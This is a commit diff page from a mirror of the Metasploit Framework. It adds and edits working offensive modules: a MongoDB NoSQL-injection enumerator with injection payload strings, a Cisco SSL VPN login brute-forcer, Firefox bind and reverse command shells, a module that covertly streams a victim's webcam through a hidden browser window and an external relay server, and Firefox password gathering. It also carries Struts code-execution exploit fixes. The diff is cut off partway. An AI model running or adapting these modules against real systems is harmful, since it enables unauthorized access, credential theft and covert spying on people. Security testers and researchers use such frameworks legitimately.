infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into staging/electro-release

bug/bundler_fix
David Maloney 2014-06-12 14:02:27 -05:00
parent fe33444858 86e4eaaaed
commit 96e492f572
No known key found for this signature in database
GPG Key ID: DEDBA9DC3A913DB2
28 changed files with 758 additions and 124 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
data/webcam/answerer.html
View File

@ -10,7 +10,7 @@
height: 480px;
width: 640px;
border-radius: 15px;
-moz-border-raidus: 15px;
-moz-border-radius: 15px;
background-color: black;
position: absolute;
left: 50;
@ -26,7 +26,7 @@
height: 180px;
width: 200px;
border-radius: 15px;
-moz-border-raidus: 15px;
-moz-border-radius: 15px;
background-color: #9B9B9B;
position: absolute;
top: 480;
@ -66,8 +66,9 @@
left: 10;
}
</style>
<script src="=WEBRTCAPIJS="> </script>
<script>
=WEBRTCAPIJS=
window.onerror = function(e) {
document.getElementById("message").innerHTML = "Error: " + e.toString();
}

17
data/webcam/offerer.html
View File

@ -2,6 +2,10 @@
<head>
<title>Video session</title>
<style type="text/css">
body {
background: #fff;
}
div.dot1 {
position: absolute;
width: 20px;
@ -84,8 +88,9 @@
}
</style>
<script src="api.js"> </script>
<script>
=WEBRTCAPIJS=
var channel = '=CHANNEL=';
var websocket = new WebSocket('ws://=SERVER=');
@ -136,10 +141,12 @@
};
window.onload = function() {
getUserMedia(function(stream) {
peer.addStream(stream);
peer.startBroadcasting();
});
setTimeout(function(){
getUserMedia(function(stream) {
peer.addStream(stream);
peer.startBroadcasting();
});
}, 500);
};
function getUserMedia(callback) {

7
lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
View File

@ -14,10 +14,11 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
# privileged javascript context
# @return [String] the results that were sent back. This can be achieved through
# calling the "send" function, or by just returning the value in +js+
def js_exec(js)
def js_exec(js, timeout=30)
print_status "Running the privileged javascript..."
session.shell_write("[JAVASCRIPT]#{js}[/JAVASCRIPT]")
session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
token = "[[#{Rex::Text.rand_text_alpha(8)}]]"
session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}")
session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout)
end
# Puts the shellcode into memory, adds X flag, and calls it

32
lib/msf/core/payload/firefox.rb
View File

@ -16,6 +16,37 @@ module Msf::Payload::Firefox
|
end
# Javascript source of readUntilToken(s)
# Continues reading the stream as data is available, until a pair of
# command tokens like [[aBcD123ffh]] [[aBcD123ffh]] is consumed.
#
# Returns a function that can be passed to the #onDataAvailable callback of
# nsIInputStreamPump that will buffer until a second token is read, or, in
# the absence of any tokens, a newline character is read.
#
# @return [String] javascript source code that exposes the readUntilToken(cb) function
def read_until_token_source
%Q|
var readUntilToken = function(cb) {
Components.utils.import("resource://gre/modules/NetUtil.jsm");
var buffer = '', m = null;
return function(request, context, stream, offset, count) {
buffer += NetUtil.readInputStreamToString(stream, count);
if (buffer.match(/^(\\[\\[\\w{8}\\]\\])/)) {
if (m = buffer.match(/^(\\[\\[\\w{8}\\]\\])([\\s\\S]*)\\1/)) {
cb(m[2]);
buffer = '';
}
} else if (buffer.indexOf("\\n") > -1) {
cb(buffer);
buffer = '';
}
};
};
|
end
# Javascript source code of readFile(path) - synchronously reads a file and returns
# its contents. The file is deleted immediately afterwards.
#
@ -189,4 +220,5 @@ module Msf::Payload::Firefox
(new ActiveXObject("WScript.Shell")).Run(cmd, 0, true);
|
end
end

1
lib/msf/core/post.rb
View File

@ -9,6 +9,7 @@ class Msf::Post < Msf::Module
require 'msf/core/post_mixin'
require 'msf/core/post/file'
require 'msf/core/post/webrtc'
require 'msf/core/post/linux'
require 'msf/core/post/osx'

57
lib/msf/core/post/webrtc.rb Normal file
View File

@ -0,0 +1,57 @@
# -*- coding: binary -*-
module Msf::Post::WebRTC
#
# Connects to a video chat session as an answerer
#
# @param offerer_id [String] The offerer's ID in order to join the video chat
# @return void
#
def connect_video_chat(server, channel, offerer_id)
interface = load_interface('answerer.html')
interface.gsub!(/\=SERVER\=/, server)
interface.gsub!(/\=RHOST\=/, rhost)
interface.gsub!(/\=CHANNEL\=/, channel)
interface.gsub!(/\=OFFERERID\=/, offerer_id)
tmp_interface = Tempfile.new(['answerer', '.html'])
tmp_interface.binmode
tmp_interface.write(interface)
tmp_interface.close
found_local_browser = Rex::Compat.open_webrtc_browser(tmp_interface.path)
unless found_local_browser
raise RuntimeError, "Unable to find a suitable browser to connect to the target"
end
end
#
# Returns the webcam interface
#
# @param html_name [String] The filename of the HTML interface (offerer.html or answerer.html)
# @return [String] The HTML interface code
#
def load_interface(html_name)
interface_path = ::File.join(Msf::Config.data_directory, 'webcam', html_name)
interface_code = ''
::File.open(interface_path) { |f| interface_code = f.read }
interface_code.gsub!(/\=WEBRTCAPIJS\=/, load_api_code)
interface_code
end
#
# Returns the webcam API
#
# @return [String] The WebRTC lib code
#
def load_api_code
js_api_path = ::File.join(Msf::Config.data_directory, 'webcam', 'api.js')
api = ''
::File.open(js_api_path) { |f| api = f.read }
api
end
end

61
lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
View File

@ -18,6 +18,7 @@ class Webcam
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::WebRTC
def initialize(client)
@client = client
@ -195,66 +196,6 @@ class Webcam
end
end
#
# Connects to a video chat session as an answerer
#
# @param offerer_id [String] The offerer's ID in order to join the video chat
# @return void
#
def connect_video_chat(server, channel, offerer_id)
interface = load_interface('answerer.html')
api = load_api_code
tmp_api = Tempfile.new('api.js')
tmp_api.binmode
tmp_api.write(api)
tmp_api.close
interface = interface.gsub(/\=SERVER\=/, server)
interface = interface.gsub(/\=WEBRTCAPIJS\=/, tmp_api.path)
interface = interface.gsub(/\=RHOST\=/, rhost)
interface = interface.gsub(/\=CHANNEL\=/, channel)
interface = interface.gsub(/\=OFFERERID\=/, offerer_id)
tmp_interface = Tempfile.new('answerer.html')
tmp_interface.binmode
tmp_interface.write(interface)
tmp_interface.close
found_local_browser = Rex::Compat.open_webrtc_browser(tmp_interface.path)
unless found_local_browser
raise RuntimeError, "Unable to find a suitable browser to connect to the target"
end
end
#
# Returns the webcam interface
#
# @param html_name [String] The filename of the HTML interface (offerer.html or answerer.html)
# @return [String] The HTML interface code
#
def load_interface(html_name)
interface_path = ::File.join(Msf::Config.data_directory, 'webcam', html_name)
interface_code = ''
::File.open(interface_path) { |f| interface_code = f.read }
interface_code
end
#
# Returns the webcam API
#
# @return [String] The WebRTC lib code
#
def load_api_code
js_api_path = ::File.join(Msf::Config.data_directory, 'webcam', 'api.js')
api = ''
::File.open(js_api_path) { |f| api = f.read }
api
end
end
end; end; end; end; end; end

91
modules/auxiliary/admin/chromecast/chromecast_youtube.rb Normal file
View File

@ -0,0 +1,91 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Chromecast YouTube Remote Control',
'Description' => %q{
This module acts as a simple remote control for Chromecast YouTube.
},
'Author' => ['wvu'],
'References' => [
['URL', 'https://en.wikipedia.org/wiki/Chromecast']
],
'License' => MSF_LICENSE,
'Actions' => [
['Play', 'Description' => 'Play video'],
['Stop', 'Description' => 'Stop video']
],
'DefaultAction' => 'Play'
))
register_options([
Opt::RPORT(8008),
OptString.new('VID', [true, 'Video ID', 'kxopViU98Xo'])
], self.class)
end
def run
vid = datastore['VID']
case action.name
when 'Play'
res = play(vid)
when 'Stop'
res = stop
end
return unless res
case res.code
when 201
print_good("Playing https://www.youtube.com/watch?v=#{vid}")
when 200
print_status("Stopping video")
when 404
print_error("Couldn't #{action.name.downcase} video")
end
end
def play(vid)
begin
send_request_cgi(
'method' => 'POST',
'uri' => '/apps/YouTube',
'agent' => Rex::Text.rand_text_english(rand(42) + 1),
'vars_post' => {
'v' => vid
}
)
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
Rex::HostUnreachable => e
fail_with(Failure::Unreachable, e)
ensure
disconnect
end
end
def stop
begin
send_request_raw(
'method' => 'DELETE',
'uri' => '/apps/YouTube',
'agent' => Rex::Text.rand_text_english(rand(42) + 1)
)
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
Rex::HostUnreachable => e
fail_with(Failure::Unreachable, e)
ensure
disconnect
end
end
end

150
modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb Normal file
View File

@ -0,0 +1,150 @@
##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => "MongoDB NoSQL Collection Enumeration Via Injection",
'Description' => %q{
This module can exploit NoSQL injections on MongoDB versions less than 2.4
and enumerate the collections available in the data via boolean injections.
},
'License' => MSF_LICENSE,
'Author' =>
['Brandon Perry <bperry.volatile@gmail.com>'],
'References' =>
[['URL', 'http://nosql.mypopescu.com/post/14453905385/attacking-nosql-and-node-js-server-side-javascript']],
'Platform' => ['linux', 'win'],
'Privileged' => false,
'DisclosureDate' => "Jun 7 2014"))
register_options(
[
OptString.new('TARGETURI', [ true, 'Full vulnerable URI with [NoSQLi] where the injection point is', '/index.php?age=50[NoSQLi]'])
], self.class)
end
def syntaxes
[["\"'||this||'", "'||[inject]||'"],
["\"';return+true;var+foo='", "';return+[inject];var+foo='"],
['\'"||this||"','"||[inject]||"'],
['\'";return+true;var+foo="', '";return+[inject];var+foo="'],
["||this","||[inject]"]]
end
def run
uri = datastore['TARGETURI']
res = send_request_cgi({
'uri' => uri.sub('[NoSQLi]', '')
})
if !res
fail_with("Server did not respond in an expected way.")
end
pay = ""
fals = res.body
tru = nil
syntaxes.each do |payload|
print_status("Testing " + payload[0])
res = send_request_cgi({
'uri' => uri.sub('[NoSQLi]', payload[0])
})
if res and res.body != fals and res.code == 200
print_status("Looks like " + payload[0] + " works")
tru = res.body
res = send_request_cgi({
'uri' => uri.sub('[NoSQLi]', payload[0].sub('true', 'false').sub('this', '!this'))
})
if res and res.body != tru and res.code == 200
vprint_status("I think I confirmed with a negative test.")
fals = res.body
pay = payload[1]
break
end
end
end
if pay == ''
fail_with("Couldn't detect a payload, maybe it isn't injectable.")
end
length = 0
vprint_status("Getting length of the number of collections.")
(0..100).each do |len|
str = "db.getCollectionNames().length==#{len}"
res = send_request_cgi({
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
})
if res and res.body == tru
length = len
print_status("#{len} collections are available")
break
end
end
vprint_status("Getting collection names")
names = []
(0...length).each do |i|
vprint_status("Getting length of name for collection " + i.to_s)
name_len = 0
(0..100).each do |k|
str = "db.getCollectionNames()[#{i}].length==#{k}"
res = send_request_cgi({
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
})
if res and res.body == tru
name_len = k
print_status("Length of collection #{i}'s name is #{k}")
break
end
end
vprint_status("Getting collection #{i}'s name")
name = ''
(0...name_len).each do |k|
[*('a'..'z'),*('0'..'9'),*('A'..'Z'),'.'].each do |c|
str = "db.getCollectionNames()[#{i}][#{k}]=='#{c}'"
res = send_request_cgi({
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
})
if res and res.body == tru
name << c
break
end
end
end
print_status("Collections #{i}'s name is " + name)
names << name
end
p = store_loot("mongo_injection.#{datastore['RHOST']}_collections",
"text/plain",
nil,
names.to_json,
"mongo_injection_#{datastore['RHOST']}.txt",
"#{datastore["RHOST"]} MongoDB Javascript Injection Collection Enumeration")
print_good("Your collections are located at: " + p)
end
end

227
modules/auxiliary/scanner/http/cisco_ssl_vpn.rb Normal file
View File

@ -0,0 +1,227 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Cisco SSL VPN Bruteforce Login Utility',
'Description' => %{
This module scans for Cisco SSL VPN web login portals and
performs login brute force to identify valid credentials.
},
'Author' =>
[
'Jonathan Claudius <jclaudius[at]trustwave.com>'
],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'SSL' => true,
'USERNAME' => 'cisco',
'PASSWORD' => 'cisco'
}
))
register_options(
[
Opt::RPORT(443),
OptString.new('GROUP', [false, "A specific VPN group to use", ''])
], self.class)
end
def run_host(ip)
unless check_conn?
vprint_error("#{peer} - Connection failed, Aborting...")
return false
end
unless is_app_ssl_vpn?
vprint_error("#{peer} - Application does not appear to be Cisco SSL VPN. Module will not continue.")
return false
end
vprint_good("#{peer} - Application appears to be Cisco SSL VPN. Module will continue.")
groups = Set.new
if datastore['GROUP'].empty?
vprint_status("#{peer} - Attempt to Enumerate VPN Groups...")
groups = enumerate_vpn_groups
if groups.empty?
vprint_warning("#{peer} - Unable to enumerate groups")
vprint_warning("#{peer} - Using the default group: DefaultWEBVPNGroup")
groups << "DefaultWEBVPNGroup"
else
vprint_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}")
end
else
groups << datastore['GROUP']
end
groups << ""
vprint_status("#{peer} - Starting login brute force...")
groups.each do |group|
each_user_pass do |user, pass|
do_login(user, pass, group)
end
end
end
# Verify whether the connection is working or not
def check_conn?
begin
res = send_request_cgi('uri' => '/', 'method' => 'GET')
vprint_good("#{peer} - Server is responsive...")
rescue ::Rex::ConnectionRefused,
::Rex::HostUnreachable,
::Rex::ConnectionTimeout,
::Rex::ConnectionError,
::Errno::EPIPE
return
end
end
def enumerate_vpn_groups
res = send_request_cgi(
'uri' => '/+CSCOE+/logon.html',
'method' => 'GET',
)
if res &&
res.code == 302
res = send_request_cgi(
'uri' => '/+CSCOE+/logon.html',
'method' => 'GET',
'vars_get' => { 'fcadbadd' => "1" }
)
end
groups = Set.new
group_name_regex = /<select id="group_list" name="group_list" style="z-index:1(?:; float:left;)?" onchange="updateLogonForm\(this\.value,{(.*)}/
if res &&
match = res.body.match(group_name_regex)
group_string = match[1]
groups = group_string.scan(/'([\w\-0-9]+)'/).flatten.to_set
end
return groups
end
# Verify whether we're working with SSL VPN or not
def is_app_ssl_vpn?
res = send_request_cgi(
'uri' => '/+CSCOE+/logon.html',
'method' => 'GET',
)
if res &&
res.code == 302
res = send_request_cgi(
'uri' => '/+CSCOE+/logon.html',
'method' => 'GET',
'vars_get' => { 'fcadbadd' => "1" }
)
end
if res &&
res.code == 200 &&
res.body.match(/webvpnlogin/)
return true
else
return false
end
end
def do_logout(cookie)
res = send_request_cgi(
'uri' => '/+webvpn+/webvpn_logout.html',
'method' => 'GET',
'cookie' => cookie
)
end
# Brute-force the login page
def do_login(user, pass, group)
vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}")
begin
cookie = "webvpn=; " +
"webvpnc=; " +
"webvpn_portal=; " +
"webvpnSharePoint=; " +
"webvpnlogin=1; " +
"webvpnLang=en;"
post_params = {
'tgroup' => '',
'next' => '',
'tgcookieset' => '',
'username' => user,
'password' => pass,
'Login' => 'Logon'
}
post_params['group_list'] = group unless group.empty?
resp = send_request_cgi(
'uri' => '/+webvpn+/index.html',
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => cookie,
'vars_post' => post_params
)
if resp &&
resp.code == 200 &&
resp.body.match(/SSL VPN Service/) &&
resp.body.match(/webvpn_logout/i)
print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}")
do_logout(resp.get_cookies)
report_hash = {
:host => rhost,
:port => rport,
:sname => 'Cisco SSL VPN',
:user => user,
:pass => pass,
:group => group,
:active => true,
:type => 'password'
}
report_auth_info(report_hash)
return :next_user
else
vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}")
end
rescue ::Rex::ConnectionRefused,
::Rex::HostUnreachable,
::Rex::ConnectionTimeout,
::Rex::ConnectionError,
::Errno::EPIPE
vprint_error("#{peer} - HTTP Connection Failed, Aborting")
return :abort
end
end
end

15
modules/auxiliary/scanner/http/dolibarr_login.rb
View File

@ -10,6 +10,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
@ -39,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
def get_sid_token
res = send_request_raw({
'method' => 'GET',
'uri' => normalize_uri(@uri.path)
'uri' => normalize_uri(@uri)
})
return [nil, nil] if res.nil? || res.get_cookies.empty?
@ -62,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
#
sid, token = get_sid_token
if sid.nil? or token.nil?
print_error("#{peer} - Unable to obtain session ID or token, cannot continue")
vprint_error("#{peer} - Unable to obtain session ID or token, cannot continue")
return :abort
else
vprint_status("#{peer} - Using sessiond ID: #{sid}")
@ -72,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("#{@uri.path}index.php"),
'uri' => normalize_uri("#{@uri}index.php"),
'cookie' => sid,
'vars_post' => {
'token' => token,
@ -91,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
end
if res.nil?
print_error("#{peer} - Connection timed out")
vprint_error("#{peer} - Connection timed out")
return :abort
end
@ -116,8 +117,12 @@ class Metasploit3 < Msf::Auxiliary
def run
@uri = target_uri.path
@uri.path << "/" if @uri.path[-1, 1] != "/"
@uri << "/" if @uri[-1, 1] != "/"
super
end
def run_host(ip)
each_user_pass { |user, pass|
vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass)

7
modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb
View File

@ -10,6 +10,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
@ -55,11 +56,11 @@ class Metasploit3 < Msf::Auxiliary
})
if not res
print_error("#{peer} - Connection timed out")
vprint_error("#{peer} - Connection timed out")
return :abort
end
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED
print_error("#{peer} - Failed to response")
vprint_error("#{peer} - Failed to response")
return :abort
end
@ -79,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
def run_host(ip)
if anonymous_access?
print_status("#{peer} - No login necessary. Server allows anonymous access.")
return

14
modules/auxiliary/scanner/http/s40_traversal.rb
View File

@ -8,6 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
@ -41,13 +42,13 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
end
def run
def run_host(ip)
uri = target_uri.path
uri << '/' if uri[-1, 1] != '/'
t = "/.." * datastore['DEPTH']
print_status("Retrieving #{datastore['FILE']}")
vprint_status("#{peer} - Retrieving #{datastore['FILE']}")
# No permission to access.log or proc/self/environ, so this is all we do :-/
uri = normalize_uri(uri, 'index.php')
@ -57,13 +58,14 @@ class Metasploit3 < Msf::Auxiliary
})
if not res
print_error("Server timed out")
vprint_error("#{peer} - Server timed out")
elsif res and res.body =~ /Error 404 requested page cannot be found/
print_error("Either the file doesn't exist, or you don't have the permission to get it")
vprint_error("#{peer} - Either the file doesn't exist, or you don't have the permission to get it")
else
# We don't save the body by default, because there's also other junk in it.
# But we still have a SAVE option just in case
print_line(res.body)
print_good("#{peer} - #{datastore['FILE']} retrieved")
vprint_line(res.body)
if datastore['SAVE']
p = store_loot(
@ -73,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
res.body,
::File.basename(datastore['FILE'])
)
print_status("File saved as: #{p}")
print_good("#{peer} - File saved as: #{p}")
end
end
end

26
modules/auxiliary/scanner/http/vcms_login.rb
View File

@ -10,14 +10,15 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'V-CMS Login Utility',
'Description' => %q{
This module attempts to authenticate to an English-based V-CMS login interface.
It should only work against version v1.1 or older, because these versions do not
have any default protections against bruteforcing.
This module attempts to authenticate to an English-based V-CMS login interface. It
should only work against version v1.1 or older, because these versions do not have
any default protections against bruteforcing.
},
'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE
@ -31,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]),
OptString.new('TARGETURI', [true, 'The URI path to dolibarr', '/vcms2/'])
OptString.new('TARGETURI', [true, 'The URI path to V-CMS', '/vcms2/'])
], self.class)
end
@ -39,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
def get_sid
res = send_request_raw({
'method' => 'GET',
'uri' => @uri.path
'uri' => @uri
})
# Get the PHP session ID
@ -52,6 +53,11 @@ class Metasploit3 < Msf::Auxiliary
def do_login(user, pass)
begin
sid = get_sid
if sid.nil?
vprint_error("#{peer} - Failed to get sid")
return :abort
end
res = send_request_cgi({
'uri' => "#{@uri}process.php",
'method' => 'POST',
@ -62,9 +68,7 @@ class Metasploit3 < Msf::Auxiliary
'sublogin' => '1'
}
})
location = res.headers['Location']
res = send_request_cgi({
'uri' => location,
'method' => 'GET',
@ -87,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
return :skip_user
when /Invalid password/
vprint_status("#{peer} - Username found: #{user}")
else /\<a href="process\.php\?logout=1"\>/
when /\<a href="process\.php\?logout=1"\>/
print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({
:host => rhost,
@ -107,8 +111,12 @@ class Metasploit3 < Msf::Auxiliary
def run
@uri = normalize_uri(target_uri.path)
@uri.path << "/" if @uri.path[-1, 1] != "/"
@uri << "/" if @uri[-1, 1] != "/"
super
end
def run_host(ip)
each_user_pass { |user, pass|
vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass)

4
modules/exploits/multi/http/struts_code_exec_parameters.rb
View File

@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
['Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'windows'
'Platform' => 'win'
}
],
['Linux Universal',
@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote
exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
when 'windows'
when 'win'
path = temp_path || './'
payload_exe = "#{path}#{payload_exe}.exe"
exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{payload_exe}')"

2
modules/exploits/multi/http/struts_include_params.rb
View File

@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
when 'windows'
when 'win'
@payload_exe = "./#{@payload_exe}.exe"
exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
else

2
modules/exploits/windows/local/s4u_persistence.rb
View File

@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Local
'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
],
'Platform' => [ 'windows' ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [ [ 'Windows', {} ] ],
'DisclosureDate' => 'Jan 2 2013', # Date of scriptjunkie's blog post

20
modules/payloads/singles/firefox/shell_bind_tcp.rb
View File

@ -6,6 +6,7 @@
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
@ -23,22 +24,14 @@ module Metasploit3
'Arch' => ARCH_FIREFOX,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'firefox',
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
'PayloadType' => 'firefox'
))
end
#
# Constructs the payload
#
def generate
super + command_string
end
#
# Returns the JS string to use for execution
#
def command_string
def generate
%Q|
(function(){
Components.utils.import("resource://gre/modules/NetUtil.jsm");
@ -59,16 +52,17 @@ module Metasploit3
}
};
#{read_until_token_source}
var clientListener = function(outStream) {
return {
onStartRequest: function(request, context) {},
onStopRequest: function(request, context) {},
onDataAvailable: function(request, context, stream, offset, count) {
var data = NetUtil.readInputStreamToString(stream, count).trim();
onDataAvailable: readUntilToken(function(data) {
runCmd(data, function(err, output) {
if(!err) outStream.write(output, output.length);
});
}
})
};
};

9
modules/payloads/singles/firefox/shell_reverse_tcp.rb
View File

@ -6,6 +6,7 @@
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
@ -45,15 +46,16 @@ module Metasploit3
.createInstance(Components.interfaces.nsIInputStreamPump);
pump.init(inStream, -1, -1, 0, 0, true);
#{read_until_token_source}
var listener = {
onStartRequest: function(request, context) {},
onStopRequest: function(request, context) {},
onDataAvailable: function(request, context, stream, offset, count) {
var data = NetUtil.readInputStreamToString(stream, count).trim();
onDataAvailable: readUntilToken(function(data) {
runCmd(data, function(err, output) {
if (!err) outStream.write(output, output.length);
});
}
})
};
#{run_cmd_source}
@ -63,4 +65,5 @@ module Metasploit3
EOS
end
end

8
modules/post/firefox/gather/passwords.rb
View File

@ -37,8 +37,12 @@ class Metasploit3 < Msf::Post
entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
end
file = store_loot("firefox.passwords.json", "text/json", rhost, passwords.to_json)
print_good("Saved #{passwords.length} passwords to #{file}")
if passwords.length > 0
file = store_loot("firefox.passwords.json", "text/json", rhost, passwords.to_json)
print_good("Saved #{passwords.length} passwords to #{file}")
else
print_warning("No passwords were found in Firefox.")
end
rescue JSON::ParserError => e
print_warning(results)
end

109
modules/post/firefox/manage/webcam_chat.rb Normal file
View File

@ -0,0 +1,109 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
include Msf::Post::WebRTC
def initialize(info={})
super(update_info(info,
'Name' => 'Firefox Webcam Chat on Privileged Javascript Shell',
'Description' => %q{
This module allows streaming a webcam from a Firefox Privileged Javascript Shell.
},
'License' => MSF_LICENSE,
'Author' => [ 'joev' ],
'DisclosureDate' => 'May 13 2014'
))
register_options([
OptBool.new('CLOSE', [false, "Forcibly close previous chat session", false]),
OptBool.new('VISIBLE', [false, "Show a window containing the chat to the target", false]),
OptInt.new('TIMEOUT', [false, "End the chat session after this many seconds", -1]),
OptString.new('ICESERVER', [true, "The ICE server that sets up the P2P connection", 'wsnodejs.jit.su:80'])
], self.class)
end
def run
unless os_check
print_error "Windows versions of Firefox are not supported at this time [RM #8810]."
return
end
server = datastore['ICESERVER']
offerer_id = Rex::Text.rand_text_alphanumeric(10)
channel = Rex::Text.rand_text_alphanumeric(20)
result = js_exec(js_payload(server, offerer_id, channel))
if datastore['CLOSE']
print_status "Stream closed."
else
if result.present?
print_status result
connect_video_chat(server, channel, offerer_id)
else
print_warning "No response received"
end
end
end
def os_check
user_agent = js_exec(%Q|
return Components.classes["@mozilla.org/network/protocol;1?name=http"]
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
|)
user_agent !~ /windows/i
end
def js_payload(server, offerer_id, channel)
interface = load_interface('offerer.html')
api = load_api_code
interface.gsub!(/\=SERVER\=/, server)
interface.gsub!(/\=CHANNEL\=/, channel)
interface.gsub!(/\=OFFERERID\=/, offerer_id)
if datastore['TIMEOUT'] > 0
api << "; setTimeout(function(){window.location='about:blank'}, #{datastore['TIMEOUT']*1000}); "
end
url = if datastore['CLOSE']
'"about:blank"'
else
'"data:text/html;base64,"+html'
end
name = if datastore['VISIBLE']
Rex::Text.rand_text_alphanumeric(10)
else
'_self'
end
%Q|
(function(send){
try {
var AppShellService = Components
.classes["@mozilla.org/appshell/appShellService;1"]
.getService(Components.interfaces.nsIAppShellService);
var html = "#{Rex::Text.encode_base64(interface)}";
var url = #{url};
AppShellService.hiddenDOMWindow.openDialog(url, '#{name}', 'chrome=1,width=1100,height=600');
send("Streaming webcam...");
} catch (e) {
send(e);
}
})(send);
|
end
end

2
modules/post/windows/gather/local_admin_search_enum.rb
View File

@ -30,7 +30,7 @@ class Metasploit3 < Msf::Post
'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
